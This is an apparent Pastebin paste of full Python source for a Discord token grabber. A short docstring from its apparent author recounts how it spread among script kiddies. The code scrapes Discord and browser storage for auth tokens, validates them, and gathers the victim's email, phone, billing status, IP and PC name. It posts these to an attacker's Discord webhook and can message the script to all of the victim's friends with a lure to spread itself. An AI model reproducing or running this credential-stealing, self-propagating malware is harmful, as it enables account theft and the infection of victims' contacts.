checksum

dTGPG payload (Python) [ORIGINAL]

Mar 22nd, 2021 (edited)
3,891
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Token grabber (Python payload) generated using dTGPG by checksum (@KaliLincox)
  2.  
  3. """
  4. This piece of shit code developed/generated by me was first published in start 2020 and has since then been widely used by script kiddies on the internet.
  5.  
  6. Right before I took down the Pastebin containing my developer credits in early 2021, it had been GET'd +200.000 times, which is most likely to be the amount of times this specific script has been executed! I feel bad about it...
  7.  
  8. In late 2019, I was bored and decided to write a tool named dTGPG (Discord Token Grabber Payload Generator) written in Python - just for fun and not for malicious purposes. The tool was capable of generating the same customizable Discord token grabber payload in various of different languages.
  9.  
  10. This specific payload that every other script kiddie is using is quite old, outdated and slightly modified by the leaker. Later versions of the payload, had options to attach itself to the Discord application, delete itself after execution and would search in all user directories and other drives for tokens.
  11.  
  12. The script was first getting popular, when a small YouTube channel named Dr. Teilaw promoted it back in ~May 2020. Right before his video got taken down, it had gotten +50.000 views.
  13.  
  14. dTGPG was never released publicly, which is why only the Python payload, which was leaked, is actively used.
  15.  
  16. Payload command-line options:
  17. - Language              : The language the payload should be generated in.
  18. - Webhook URL           : Threat actors Discord webhook URL.
  19. - Self spread           : Spread the malware to all friends of the victim.
  20. - Self spread message   : Message sent above the attached malware - e.g. "Check this out! :o".
  21. - Self spread file name : Malware file name when it's sent in DM's.
  22. - Self spread delay     : Delay between each message.
  23. - Obfuscation           : Obfuscates the payload for the specified language.
  24. - Ping on hit           : Mentions/pings @everyone in the channel where the tokens are sent to.
  25. - Prevent spam          : Caches all tokens locally on the victim's machine, so if the victim re-executes the malware, it will only new working tokens, if they are not already cached.
  26. - Embed color           : Embed color
  27. - Webhook username      : Webhook username
  28. - Webhook avatar        : Webhook avatar
  29.  
  30. Supported languages:
  31. - Batch
  32. - Ruby
  33. - Go
  34. - PowerShell
  35. - Python
  36. - NodeJS / JavaScript
  37. - VisualBasic Script
  38. """
  39.  
  40. import os
  41.  
  42. if os.name != 'nt':
  43.     exit()
  44.  
  45. from re import findall
  46. from json import loads, dumps
  47. from base64 import b64decode
  48. from subprocess import Popen, PIPE
  49. from urllib.request import Request, urlopen
  50. from datetime import datetime
  51. from threading import Thread
  52. from time import sleep
  53. from sys import argv
  54.  
  55. LOCAL = os.getenv('LOCALAPPDATA')
  56. ROAMING = os.getenv('APPDATA')
  57. PATHS = {
  58.     'Discord'           : ROAMING + '\\Discord',
  59.     'Discord Canary'    : ROAMING + '\\DiscordCanary',
  60.     'Discord PTB'       : ROAMING + '\\DiscordPTB',
  61.     'Google Chrome'     : LOCAL + '\\Google\\Chrome\\User Data\\Default',
  62.     'Opera'             : ROAMING + '\\Opera Software\\Opera Stable',
  63.     'Brave'             : LOCAL + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
  64.     'Yandex'            : LOCAL + '\\Yandex\\YandexBrowser\\User Data\\Default'
  65. }
  66.  
  67. def get_headers(token=None, content_type='application/json'):
  68.     headers = {
  69.         'Content-Type': content_type,
  70.         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
  71.     }
  72.     if token:
  73.         headers.update({'Authorization': token})
  74.     return headers
  75.  
  76. def get_user_data(token):
  77.     try:
  78.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me', headers=get_headers(token))).read().decode())
  79.     except:
  80.         pass
  81.  
  82. def get_tokens(path):
  83.     path += '\\Local Storage\\leveldb'
  84.     tokens = []
  85.     for file_name in os.listdir(path):
  86.         if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
  87.             continue
  88.         for line in (x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()):
  89.             for token in findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', line):
  90.                 tokens.append(token)
  91.     return tokens
  92.  
  93. def get_developer():
  94.     dev = 'checksum'
  95.     try:
  96.         dev = urlopen(Request('https://pastebin.com/raw/ssFxiejv')).read().decode()
  97.     except:
  98.         pass
  99.     return dev
  100.  
  101. def get_ip():
  102.     ip = 'None'
  103.     try:
  104.         ip = urlopen(Request('https://api.ipify.org')).read().decode().strip()
  105.     except:
  106.         pass
  107.     return ip
  108.  
  109. def get_avatar(uid, aid):
  110.     url = f'https://cdn.discordapp.com/avatars/{uid}/{aid}.gif'
  111.     try:
  112.         urlopen(Request(url))
  113.     except:
  114.         url = url[:-4]
  115.     return url
  116.  
  117. def get_hwid():
  118.     """ Deprecated """
  119.     p = Popen('wmic csproduct get uuid', shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
  120.     return (p.stdout.read() + p.stderr.read()).decode().split('\n')[1]
  121.  
  122. def get_friends(token):
  123.     try:
  124.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/relationships', headers=get_headers(token))).read().decode())
  125.     except:
  126.         pass
  127.  
  128. def get_chat(token, uid):
  129.     try:
  130.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/channels', headers=get_headers(token), data=dumps({'recipient_id': uid}).encode())).read().decode())['id']
  131.     except:
  132.         pass
  133.  
  134. def has_payment_methods(token):
  135.     try:
  136.         return len(loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers=get_headers(token))).read().decode())) > 0
  137.     except:
  138.         pass
  139.  
  140. def send_message(token, chat_id, form_data):
  141.     try:
  142.         urlopen(Request(f'https://discordapp.com/api/v6/channels/{chat_id}/messages', headers=get_headers(token, 'multipart/form-data; boundary=---------------------------325414537030329320151394843687'), data=form_data.encode())).read().decode()
  143.     except:
  144.         pass
  145.  
  146. def spread(token, form_data, delay):
  147.     for friend in get_friends(token):
  148.         try:
  149.             chat_id = get_chat(token, friend['id'])
  150.             send_message(token, chat_id, form_data)
  151.         except:
  152.             pass
  153.         sleep(delay)
  154.  
  155. def main():
  156.     # configuration part
  157.     # this part was originally never in the script,
  158.     # as the payload was generated through a tool I developed in late 2019,
  159.     # which would directly change values where the values are used instead of
  160.     # declaring variables to keep the code as short as possible, and add a little extra obfuscation.
  161.     prevent_spam = True
  162.     self_spread = False
  163.     ping_on_hit = True
  164.     webhook_url = 'https://discord.com/api/webhooks/.../...'
  165.     self_spread_message = 'Check this out :open_mouth:'
  166.     self_spread_file_name = 'exploit.py'
  167.     self_spread_delay = 7500 / 1000
  168.  
  169.     ip = get_ip()
  170.     pc_username = os.getenv('UserName')
  171.     pc_name = os.getenv('COMPUTERNAME')
  172.     developer = get_developer()
  173.  
  174.     cache_path = ROAMING + '\\.cache~$'
  175.  
  176.     already_cached_tokens = []
  177.     if prevent_spam and os.path.exists(cache_path):
  178.         with open(cache_path) as f:
  179.             already_cached_tokens = [x.strip() for x in f.readlines() if x.strip()]
  180.  
  181.     embeds = []
  182.     checked_tokens = already_cached_tokens.copy()
  183.     working_tokens = []
  184.     working_ids = []
  185.  
  186.     for platform, path in PATHS.items():
  187.         if not os.path.exists(path):
  188.             continue
  189.  
  190.         for token in get_tokens(path):
  191.             if token in checked_tokens:
  192.                 continue
  193.  
  194.             checked_tokens.append(token)
  195.  
  196.             uid = None
  197.             if not token.startswith('mfa.'):
  198.                 try:
  199.                     uid = b64decode(token.split('.')[0].encode()).decode()
  200.                 except:
  201.                     pass
  202.  
  203.                 if not uid or uid in working_ids:
  204.                     continue
  205.  
  206.             user_data = get_user_data(token)
  207.  
  208.             if not user_data:
  209.                 continue
  210.  
  211.             working_ids.append(uid)
  212.             working_tokens.append(token)
  213.  
  214.             username = user_data['username'] + '#' + str(user_data['discriminator'])
  215.  
  216.             user_id = user_data['id']
  217.             avatar_id = user_data['avatar']
  218.             avatar_url = get_avatar(user_id, avatar_id)
  219.             email = user_data.get('email')
  220.             phone = user_data.get('phone')
  221.             nitro = bool(user_data.get('premium_type'))
  222.             billing = has_payment_methods(token)
  223.  
  224.             embed = {
  225.                 'color': 0x7289DA,
  226.                 'fields': [
  227.                     {
  228.                         'name': '**Account Info**',
  229.                         'value': f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
  230.                         'inline': True
  231.                     },
  232.                     {
  233.                         'name': '**PC Info**',
  234.                         'value': f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
  235.                         'inline': True
  236.                     },
  237.                     {
  238.                         'name': '**Token**',
  239.                         'value': token,
  240.                         'inline': False
  241.                     }
  242.                 ],
  243.                 'author': {
  244.                     'name': f'{username} ({user_id})',
  245.                     'icon_url': avatar_url
  246.                 },
  247.                 'footer': {
  248.                     'text': f'Token grabber by {developer}'
  249.                 }
  250.             }
  251.             embeds.append(embed)
  252.  
  253.     if prevent_spam:
  254.         with open(cache_path, 'a') as f:
  255.             for token in checked_tokens:
  256.                 if not token in already_cached_tokens:
  257.                     f.write(token + '\n')
  258.  
  259.     if len(working_tokens) == 0:
  260.         return
  261.  
  262.     webhook = {
  263.         'content': '@everyone' if ping_on_hit else '',
  264.         'embeds': embeds,
  265.         'username': 'Discord Token Grabber',
  266.         'avatar_url': 'https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png'
  267.     }
  268.  
  269.     try:
  270.         urlopen(Request(webhook_url, data=dumps(webhook).encode(), headers=get_headers()))
  271.     except:
  272.         pass
  273.  
  274.     if self_spread:
  275.         with open(argv[0], encoding='utf-8') as f:
  276.             content = f.read()
  277.  
  278.         payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{self_spread_file_name}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\n{self_spread_message}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
  279.  
  280.         for token in working_tokens:
  281.             Thread(target=spread, args=(token, payload, self_spread_delay)).start()
  282.  
  283. try:
  284.     main()
  285. except:
  286.     pass
  287.  
RAW Paste Data